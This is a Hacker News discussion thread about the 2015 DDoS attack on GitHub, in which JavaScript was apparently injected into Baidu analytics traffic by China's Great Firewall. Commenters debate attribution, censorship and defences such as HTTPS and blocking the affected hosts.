"GitHub is the preferred tool for programmers to learn and connect with the rest of the world," he said in his Chinese-language post. He added that the site supported no political ideology, nor contained any reactionary content. "Blocking GitHub is unjustifiable, and will only derail the nation's programmers from the world, while bringing about a loss in competitiveness and insight."

Lee's post was re-tweeted over 80,000 times on Sina Weibo, and featured in news articles on Wednesday. In another post, he later compared the blocking to trying to catch a mouse by burning the entire house down.

http://www.computerworld.com/article/2493478/internet/github...


> information about and software for circumventing the Chinese government's internet censorship systems -- which, among many other things, blocks access to, eg, Google, and The New York Times.

The actual impact of the attack was to have thousands of news outlets and discussion forum sites mention and link to the github repos that offer circumvention.

Further, by attacking Github, it's guaranteed that many of the most tech-savvy Chinese internet users will have the existance of the forbidden repos launched into their consciousness.

Of course the Chinese government knows this and was likely not responsible for the attack.

The attack would not be possible to commit by the actual perpetrator if there weren't such a knee-jerk bias against the Chinese government's internet censorship.

Let it also be noted that the US Government censors lots of information too, both through so-called "official secrets" requiring security clearance granted by party members, and via laws that crack down on things deemed morally wrong, as well as illicit drugs.


> Of course the Chinese government knows this and was likely not responsible for the attack.

This is an example of the logical fallacy of "argumentum ad stultum", or "appeal to stupidty".

It goes like this:

- X would be stupid. - No one would ever do anything stupid. : Therefore no one would ever do X.

There are so many counter-examples to this argument that they hardly bear mentioning. People do stupid things every day of the week and twice on Sundays. Organizations multiply stupidity as often as they moderate it.

It may be that this wasn't the Chinese government, but pointing out that it would be stupid for them to do so is not an argument against it at all.


> People do stupid things every day of the week and twice on Sundays.

While you are correct in pointing out the logical fallacy, there have been several examples of highly likely false-flag cyber attacks lately. The Sony hack is another example, the result of which was the exact opposite of what the state actor alleged to have done the attack wanted.

"Cyber attacks" are a great platform for false flag attacks because it's easy to obtain servers or DDOS drones in any country.

I'd say a good indicator of strategy like this going on is when a defacing attack is accompanied by targeted data breach. Chances are the data breach was the goal, and the defacing the smoke screen.

Many HN readers could stage a cyber attack that would be initially linked to North Korea or China with a few hours of reading/research.


I'm not sure why you are being downvoted; I think differing opinions are the heart of HN.

> so-called "official secrets" requiring security clearance granted by party members

It appears that you're not from the U.S. or another Western-aligned country, security clearances aren't granted to or by the dominant political parties, but are an artifact of government and military/defense industry bureaucracy.


Apparently the first attack was targeted at: https://github.com/cn-nytimes/ and https://github.com/greatfire/

Source: https://news.ycombinator.com/item?id=9284547

Edit: They are also mentioned in the parent article (!!)


how is it possible that someone can carry this kind of attack without facing any kind of legal consequences? I know they are china we're not going to start a war with them but shit is there really no legal authority here?


This is some terrible JavaScript. And jQuery?


Yeah, they ought to put it on GitHub and accept pull requests.


But it works, so...


It's obfuscated.


Even un-obfuscated it's pretty gross.


Does baidu have any say in this at all? Were they hacked to include this script or they just passively allowed it?


The Great Firewall of China can be used to "weaponize" any website passing through it. So, it can be used to inject a malicious script on Baidu delivered to non-Chinese IPs (as we see here) or Chinese IPs. It can also be used to inject a malicious script into Google AdSense for Chinese IPs as well as China has control of a digital certificate provider accepted by all major browsers and operating systems. One they have issued SSL certificates that can be used to impersonate Google et al this year.

The bottom line is that, much like the matrix, everything within China is still part of that system and can be weaponized by the Chinese government. So, be sure you never have anything from within Chinese IP address space loaded by your web pages or apps.


And remember to remove the CNNIC Root CA from your certificate store unless you know you need it.


Baidu have not been hacked. Their servers reside inside the great firewall meaning any request from outside China has to traverse the GFW before arriving at Baidu's servers. During traversal of the GFW, the Chinese gov is modifying the Baidu server response with malicious javascript.

Baidu has no say in the matter. They could try and help Github by swapping to only serving their analytics scripts over HTTPS. Even then, this would only help once a large majority of existing websites that use Baidu analytics have updated their website code to point to the HTTPS URL. Until then the attack would probably still continue to work.


It sounds like to me despite Baidu not being involved they are being used as a vector of attack. It seems reasonable for anyone using Baidu to find an alternative for all of their services. After seeing that China is modifying responses how can we trust any request that goes past the GFW?


"It seems reasonable for anyone using Baidu to find an alternative for all of their services."

As always, majority of them simply don't care. Did many people stopped using Google after Snowden's leak on this side of GFW?


>After seeing that China is modifying responses how can we trust any request that goes past the GFW

You can't unless it's an HTTPS request (and even then you may still want to be suspicious).


For HTTP connections, is there a current best practice that a javascript author can use to make sure that their code hasn't been modified by a MitM prior to execution on the browser?


Use HTTPS. That's it. With HTTP any part of a web page's code can be altered/replaced by a MitM attack. So any theoretical protection a javascript author put in place to try and detect a MitM attack could also easily be circumvented.


As the article points out, the innocent request to baidu is being intercepted by China and replaced with a malicious script.


Various sources are reporting that Baidu says they haven't been hacked, but I'm having trouble finding their source.

eg, Ars - http://arstechnica.com/security/2015/03/github-battles-large...


"Based on reports we've received, we believe the intent of this attack is to convince us to remove a specific class of content."

Does anyone know what that "specific class of content" is, or can shed some light over the motivation of the attacks?


> As can be seen in the code, the two targeted URLs are github.com/greatfire and github.com/cn-nytimes, which are mirror sites for GreatFire.org and the Chinese New York Times. GreatFire and NYT both use GitHub to circumvent the online censorship performed by the Great Firewall of China (GFW).


I read that. Can someone shed some light over the motivation of the attacks?


Defending against an DoS-attack costs money. People try to spend as few money as possible.

So, the theory is that the attacker wants github to take the repos down by making it costly to not do so.


I wonder why TCP implementations don't monitor mid-stream changes to things like packet TTLs and optionally drop the connections as a result, or rather, I wonder what would break if they did something like that.


I was under the impression that the attack had evolved since this tactic. Is there any word on what the current attack looks like? Or is it still this?


Please modify your hosts file, so you will not be a unwilling participants of GFW of China in the future!

for example in windows:

127.0.0.1 libs.baidu.com

127.0.0.1 hm.baidu.com

other chinese GFW attack host

....


Are there any tools that would allow me to detect this kind of attack on my computer? I'd prefer not to DoS github.


If Great Firewall of China could modify the javascript, is it possible for U.S. to change it to a non-harmful script?


Well, that's a good analysis article and a good promotion for CapLoader.

Wireshark indeed can do better on Gantt charts and graphs


Could this be prevented by stricter CSP server-side?


> China's Man-on-the-Side Attack on GitHub > and can conclude that China is using their active and passive network infrastructure

China is a country that has 1.35B people in it. I guarantee you that 99.9% of those people had nothing to do with this attack. Can we stop using "China" and be more specific? It feels like it's blaming innocent people and possibly an entire innocent country.

Chinese attackers? The Chinese government? People outside China who hacked Chinese internet infrastructure? At this point can we even be certain who specifically is to blame?


> Can we stop using "China" and be more specific?

Unfortunately, it is common usage to refer to the actions of a government as the actions of the country itself.

You don't hear people say "The US Government invaded Iraq"; you instead hear "US invaded Iraq". You don't hear "The Kingdom of Saudi Arabia's government committed airstrikes in Yemen"; you hear "Saudis committed airstrikes in Yemen".

To the broader point, about citizenry -versus- government: to some extent, as an American, I do feel a little responsible for my government's actions; and periodically do approach my senators and congresswoman to express my disagreement with the policies they have espoused. Maybe Chinese citizens can also chime in and ask their government (via Weibo or whatever medium is possible) why it's doing this to GitHub? Though probable most people on this planet would have no idea what "GitHub" is, so I'm not sure if anyone outside the tech world cares.


Nobody is sitting here equating the word "China" with the entirety of the Chinese people.


people know that it refers to the chinese government, rather than the people.

you can be more specific if you'd like, but it is unnecessary.


People are as much responsible for their governments as the governments are responsible for their people. You can’t let a couple thugs run your country and then say “oh I never liked them, so don’t blame me!!111” when someone points out that they’re thugs.




Join us for AI Startup School this June 16-17 in San Francisco!

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: